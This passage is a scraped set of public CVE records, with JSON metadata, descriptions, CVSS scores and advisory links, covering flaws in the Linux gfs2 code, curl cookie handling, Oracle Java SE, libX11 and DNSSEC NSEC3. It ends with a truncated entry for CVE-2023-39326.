"original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dump\n\nSyzkaller has reported a NULL pointer dereference when accessing\nrgd-\u003erd_rgl in gfs2_rgrp_dump(). This can happen when creating\nrgd-\u003erd_gl fails in read_rindex_entry(). Add a NULL pointer check in\ngfs2_rgrp_dump() to prevent that." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:19:41.639Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/efc8ef87ab9185a23d5676f2f7d986022d91bcde" }, { "url": "https://git.kernel.org/stable/c/5c28478af371a1c3fdb570ca67f110e1ae60fc37" }, { "url": "https://git.kernel.org/stable/c/ee0586d73cbaf0e7058bc640d62a9daf2dfa9178" }, { "url": "https://git.kernel.org/stable/c/d69d7804cf9e2ba171a27e5f98bc266f13d0414a" }, { "url": "https://git.kernel.org/stable/c/067a7c48c2c70f05f9460d6f0e8423e234729f05" }, { "url": "https://git.kernel.org/stable/c/c323efd620c741168c8e0cc6fc0be04ab57e331a" }, { "url": "https://git.kernel.org/stable/c/8877243beafa7c6bfc42022cbfdf9e39b25bd4fa" } ], "title": "gfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dump", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52448", "datePublished": "2024-02-22T16:21:39.915Z", "dateReserved": "2024-02-20T12:30:33.292Z", "dateUpdated": "2024-12-19T08:19:41.639Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-38546
Vulnerability from cvelistv5
Published
2023-10-18 03:51
Modified
2024-09-13 15:02
Severity ?
EPSS score ?
Summary
This flaw allows an attacker to insert cookies at will into a running program
using libcurl, if the specific series of conditions are met.
libcurl performs transfers. In its API, an application creates "easy handles"
that are the individual handles for single transfers.
libcurl provides a function call that duplicates en easy handle called
[curl_easy_duphandle](https://curl.se/libcurl/c/curl_easy_duphandle.html).
If a transfer has cookies enabled when the handle is duplicated, the
cookie-enable state is also cloned - but without cloning the actual
cookies. If the source handle did not read any cookies from a specific file on
disk, the cloned version of the handle would instead store the file name as
`none` (using the four ASCII letters, no quotes).
Subsequent use of the cloned handle that does not explicitly set a source to
load cookies from would then inadvertently load cookies from a file named
`none` - if such a file exists and is readable in the current directory of the
program using libcurl. And if using the correct file format of course.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:46:55.785Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://curl.se/docs/CVE-2023-38546.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGMXNRNSJ4ETDK6FRNU3J7SABXPWCHSQ/" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214036" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214063" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214057" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214058" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Jan/34" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Jan/37" }, { "tags": [ "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Jan/38" }, { "tags": [ "x_transferred" ], "url": "https://forum.vmssoftware.com/viewtopic.php?f=8\u0026t=8868" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-38546", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-09-13T15:01:53.358515Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-09-13T15:02:37.137Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": "curl", "vendor": "curl", "versions": [ { "lessThan": "8.4.0", "status": "affected", "version": "8.4.0", "versionType": "semver" }, { "lessThan": "7.9.1", "status": "unaffected", "version": "7.9.1", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "value": "This flaw allows an attacker to insert cookies at will into a running program\nusing libcurl, if the specific series of conditions are met.\n\nlibcurl performs transfers. In its API, an application creates \"easy handles\"\nthat are the individual handles for single transfers.\n\nlibcurl provides a function call that duplicates en easy handle called\n[curl_easy_duphandle](https://curl.se/libcurl/c/curl_easy_duphandle.html).\n\nIf a transfer has cookies enabled when the handle is duplicated, the\ncookie-enable state is also cloned - but without cloning the actual\ncookies. If the source handle did not read any cookies from a specific file on\ndisk, the cloned version of the handle would instead store the file name as\n`none` (using the four ASCII letters, no quotes).\n\nSubsequent use of the cloned handle that does not explicitly set a source to\nload cookies from would then inadvertently load cookies from a file named\n`none` - if such a file exists and is readable in the current directory of the\nprogram using libcurl. And if using the correct file format of course.\n" } ], "providerMetadata": { "dateUpdated": "2023-10-18T03:51:31.276Z", "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "shortName": "hackerone" }, "references": [ { "url": "https://curl.se/docs/CVE-2023-38546.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGMXNRNSJ4ETDK6FRNU3J7SABXPWCHSQ/" }, { "url": "https://support.apple.com/kb/HT214036" }, { "url": "https://support.apple.com/kb/HT214063" }, { "url": "https://support.apple.com/kb/HT214057" }, { "url": "https://support.apple.com/kb/HT214058" }, { "url": "http://seclists.org/fulldisclosure/2024/Jan/34" }, { "url": "http://seclists.org/fulldisclosure/2024/Jan/37" }, { "url": "http://seclists.org/fulldisclosure/2024/Jan/38" }, { "url": "https://forum.vmssoftware.com/viewtopic.php?f=8\u0026t=8868" } ] } }, "cveMetadata": { "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1", "assignerShortName": "hackerone", "cveId": "CVE-2023-38546", "datePublished": "2023-10-18T03:51:31.276Z", "dateReserved": "2023-07-20T01:00:12.444Z", "dateUpdated": "2024-09-13T15:02:37.137Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-21068
Vulnerability from cvelistv5
Published
2024-04-16 21:26
Modified
2024-11-05 21:22
Severity ?
EPSS score ?
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Oracle Corporation | Java SE JDK and JRE |
Version: Oracle Java SE:8u401-perf Version: Oracle Java SE:11.0.22 Version: Oracle Java SE:17.0.10 Version: Oracle Java SE:21.0.2 Version: Oracle Java SE:22 Version: Oracle GraalVM for JDK:17.0.10 Version: Oracle GraalVM for JDK:21.0.2 Version: Oracle GraalVM for JDK:22 Version: Oracle GraalVM Enterprise Edition:21.3.9 cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:* cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:* cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:* |
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-21068", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-03T19:30:18.174295Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-noinfo Not enough information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-05T21:22:59.909Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T22:13:42.375Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "cpes": [ "cpe:2.3:a:oracle:java_se:8u401:*:*:*:enterprise_performance:*:*:*", "cpe:2.3:a:oracle:java_se:11.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:java_se:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:17.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:21.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm_for_jdk:22:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:graalvm:21.3.9:*:*:*:enterprise:*:*:*" ], "product": "Java SE JDK and JRE", "vendor": "Oracle Corporation", "versions": [ { "status": "affected", "version": "Oracle Java SE:8u401-perf" }, { "status": "affected", "version": "Oracle Java SE:11.0.22" }, { "status": "affected", "version": "Oracle Java SE:17.0.10" }, { "status": "affected", "version": "Oracle Java SE:21.0.2" }, { "status": "affected", "version": "Oracle Java SE:22" }, { "status": "affected", "version": "Oracle GraalVM for JDK:17.0.10" }, { "status": "affected", "version": "Oracle GraalVM for JDK:21.0.2" }, { "status": "affected", "version": "Oracle GraalVM for JDK:22" }, { "status": "affected", "version": "Oracle GraalVM Enterprise Edition:21.3.9" } ] } ], "descriptions": [ { "lang": "en-US", "value": "Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u401-perf, 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2 and 22; Oracle GraalVM Enterprise Edition: 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data.", "lang": "en-US" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-16T21:26:21.424Z", "orgId": "43595867-4340-4103-b7a2-9a5208d29a85", "shortName": "oracle" }, "references": [ { "name": "Oracle Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2024.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00014.html" }, { "url": "https://security.netapp.com/advisory/ntap-20240426-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85", "assignerShortName": "oracle", "cveId": "CVE-2024-21068", "datePublished": "2024-04-16T21:26:21.424Z", "dateReserved": "2023-12-07T22:28:10.665Z", "dateUpdated": "2024-11-05T21:22:59.909Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-43786
Vulnerability from cvelistv5
Published
2023-10-10 12:26
Modified
2024-11-23 02:02
Severity ?
EPSS score ?
Summary
A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2145 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2973 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-43786 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2242253 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-43786", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-04-25T16:06:07.325768Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:25:57.723Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T19:52:11.346Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/24/9" }, { "name": "RHSA-2024:2145", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2145" }, { "name": "RHSA-2024:2973", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2973" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43786" }, { "name": "RHBZ#2242253", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242253" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/63IBRFLQVZSMOAZBZOBKFWJP26ILRAGQ/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231103-0006/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.freedesktop.org/xorg/lib/libxpm", "defaultStatus": "unaffected", "packageName": "libXpm", "versions": [ { "lessThan": "3.5.17", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "libX11", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.6.8-8.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libX11", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.7.0-9.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libX11", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libX11", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2023-10-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-400", "description": "Uncontrolled Resource Consumption", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T02:02:48.347Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2145", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2145" }, { "name": "RHSA-2024:2973", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2973" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43786" }, { "name": "RHBZ#2242253", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242253" } ], "timeline": [ { "lang": "en", "time": "2023-10-05T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-10-04T00:00:00+00:00", "value": "Made public." } ], "title": "Libx11: stack exhaustion from infinite recursion in putsubimage()", "x_redhatCweChain": "CWE-400: Uncontrolled Resource Consumption" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-43786", "datePublished": "2023-10-10T12:26:07.399Z", "dateReserved": "2023-09-22T09:52:31.108Z", "dateUpdated": "2024-11-23T02:02:48.347Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-50868
Vulnerability from cvelistv5
Published
2024-02-14 00:00
Modified
2024-08-02 22:23
Severity ?
EPSS score ?
Summary
The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:23:43.905Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "tags": [ "x_transferred" ], "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "tags": [ "x_transferred" ], "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "tags": [ "x_transferred" ], "url": "https://datatracker.ietf.org/doc/html/rfc5155" }, { "tags": [ "x_transferred" ], "url": "https://kb.isc.org/docs/cve-2023-50868" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "tags": [ "x_transferred" ], "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-50868" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219826" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240307-0008/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the \"NSEC3\" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-10T16:14:14.129606", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://nlnetlabs.nl/news/2024/Feb/13/unbound-1.19.1-released/" }, { "url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2024-01.html" }, { "url": "https://www.isc.org/blogs/2024-bind-security-release/" }, { "url": "https://datatracker.ietf.org/doc/html/rfc5155" }, { "url": "https://kb.isc.org/docs/cve-2023-50868" }, { "url": "https://gitlab.nic.cz/knot/knot-resolver/-/releases/v5.7.1" }, { "url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2024q1/017430.html" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-50868" }, { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1219826" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/2" }, { "name": "[oss-security] 20240216 Re: Unbound: disclosure of CVE-2023-50387 and CVE-2023-50868 DNSSEC validation vulnerabilities", "tags": [ "mailing-list" ], "url": "http://www.openwall.com/lists/oss-security/2024/02/16/3" }, { "name": "FEDORA-2024-2e26eccfcb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVYA42BLXUCIDLD35YIJPJSHDIADNYMP/" }, { "name": "FEDORA-2024-e24211eff0", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BUIP7T7Z4T3UHLXFWG6XIVDP4GYPD3AI/" }, { "name": "FEDORA-2024-21310568fa", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PNNHZSZPG2E7NBMBNYPGHCFI4V4XRWNQ/" }, { "name": "[debian-lts-announce] 20240221 [SECURITY] [DLA 3736-1] unbound security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00006.html" }, { "name": "FEDORA-2024-b0f9656a76", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEXGOYGW7DBS3N2QSSQONZ4ENIRQEAPG/" }, { "name": "FEDORA-2024-4e36df9dfd", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQESRWMJCF4JEYJEAKLRM6CT55GLJAB7/" }, { "name": "FEDORA-2024-499b9be35f", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RGS7JN6FZXUSTC2XKQHH27574XOULYYJ/" }, { "name": "FEDORA-2024-c36c448396", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVRDSJVZKMCXKKPP6PNR62T7RWZ3YSDZ/" }, { "name": "FEDORA-2024-c967c7d287", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6FV5O347JTX7P5OZA6NGO4MKTXRXMKOZ/" }, { "name": "FEDORA-2024-e00eceb11c", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IGSLGKUAQTW5JPPZCMF5YPEYALLRUZZ6/" }, { "name": "FEDORA-2024-fae88b73eb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZDZFMEKQTZ4L7RY46FCENWFB5MDT263R/" }, { "url": "https://security.netapp.com/advisory/ntap-20240307-0008/" }, { "name": "[debian-lts-announce] 20240517 [SECURITY] [DLA 3816-1] bind9 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00011.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-50868", "datePublished": "2024-02-14T00:00:00", "dateReserved": "2023-12-14T00:00:00", "dateUpdated": "2024-08-02T22:23:43.905Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-39326
Vulnerability from cvelistv5
Published
2023-12-06 16:27
Modified
2024-08-02 18:02
Severity ?
EPSS score ?
Summary
